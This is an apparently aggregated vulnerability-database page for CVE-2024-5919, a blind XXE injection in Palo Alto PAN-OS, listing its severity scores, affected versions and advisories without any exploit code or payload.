CVE-2024-5919XML External Entity (XXE) Injection in Palo Alto Networks Pan-os

CWE-611XML External Entity (XXE) Injection5 documents5 sources
Severity
5.1MEDIUMNVD
EPSS
0.2%
top 58.50%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
5
Palo Alto Networks Pan-osPaloaltonetworks Pan-osPaloalto Cloud Ngfw+2 more
Timeline
PublishedNov 14

Description

A blind XML External Entities (XXE) injection vulnerability in the Palo Alto Networks PAN-OS software enables an authenticated attacker to exfiltrate arbitrary files from firewalls to an attacker controlled server. This attack requires network access to the firewall management interface.

CVSS vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

Affected Packages5 packages

NVDpaloaltonetworks/pan-os10.1.010.1.10+2
CVEListV5palo_alto_networks/pan-os11.0.011.0.2+2
Palo Altopaloalto/pan-os

🔴Vulnerability Details

2
CVEList
PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability2024-11-14
GHSA
GHSA-m359-59cc-2426: A blind XML External Entities (XXE) injection vulnerability in the Palo Alto Networks PAN-OS software enables an authenticated attacker to exfiltrate2024-11-14

📋Vendor Advisories

1
Palo Alto
PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability

💬Community

1
Bugzilla
CVE-2024-36957 kernel: octeontx2-af: avoid off-by-one read from userspace2024-06-03
CVE-2024-5919 — XML External Entity (XXE) Injection | cvebase